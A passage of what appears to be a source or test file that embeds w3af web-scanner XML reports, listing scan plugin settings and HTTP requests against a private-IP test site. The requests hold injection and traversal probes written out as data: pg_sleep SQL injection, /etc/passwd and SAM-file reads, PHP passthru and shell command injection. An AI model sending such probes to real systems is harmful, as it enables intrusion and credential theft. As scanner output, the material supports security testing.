                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+pg_sleep%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+pg_sleep%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="867">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+pg_sleep%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+pg_sleep%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3af-run>
"""


report_high = r"""<w3af-run start="1432116790" start-long="Wed May 20 12:13:10 2015" version="2.1">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.49
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scan-info target="http://10.12.68.43:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js">
                <config parameter="secure_js_file" value="w3af/plugins/grep/cross_domain_js/secure-js-sources.txt"/>
            </plugin>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="template" value="w3af/plugins/output/html_file/templates/complete.html"/>
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scan-info>
    <vulnerability id="[18, 168, 42, 49, 56, 60, 74, 63, 65, 69, 70, 202, 75, 77, 206, 205, 209, 210, 83, 84, 214, 215, 207, 99, 100, 102, 211, 212, 126, 127]" method="GET" name="Strange header" plugin="strange_headers" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The remote web server sent 18 HTTP responses with the uncommon response header &quot;host&quot;, one of the received header values is &quot;10.12.68.43:31337&quot;. The first ten URLs which sent the uncommon header are:
 - http://10.12.68.43:31337/admin-console/
 - http://10.12.68.43:31337/web-console/ServerInfo.jsp
 - http://10.12.68.43:31337/status
 - http://10.12.68.43:31337/ptgWm.html
 - http://10.12.68.43:31337/
 - http://10.12.68.43:31337/10.7z
 - http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll
 - http://10.12.68.43:31337/invoker/JMXInvokerServlet
 - http://10.12.68.43:31337/RtzeV
 - http://10.12.68.43:31337/10.cab
</description>
        <http-transactions>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="168">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="42">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=yMHNeEh HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="49">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/RtzeV HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">sFeQyK</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="56">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="60">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=.%2F..%2F..%2F..%2Fetc%2Fmotd%00html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="74">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=ps%20-aux HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="63">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=id&amp;uname%20-a= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="65">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=%3C%3F%20passthru%28%22id%22%29&amp;%3F%3E= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="69">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%20c%3A%5C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="70">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=type%20c%3A%5Cwinnt%5Crepair%5Csam._ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="202">
                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="75">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=..%2F..%2F..%2F..%2Fbin%2Fchgrp%20nobody%20%2Fetc%2Fshadow%7C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="77">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?J3xsEfP=SELECT%20TOP%201%20name%20FROM%20sysusers HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="206">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="210">
                <http-request>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
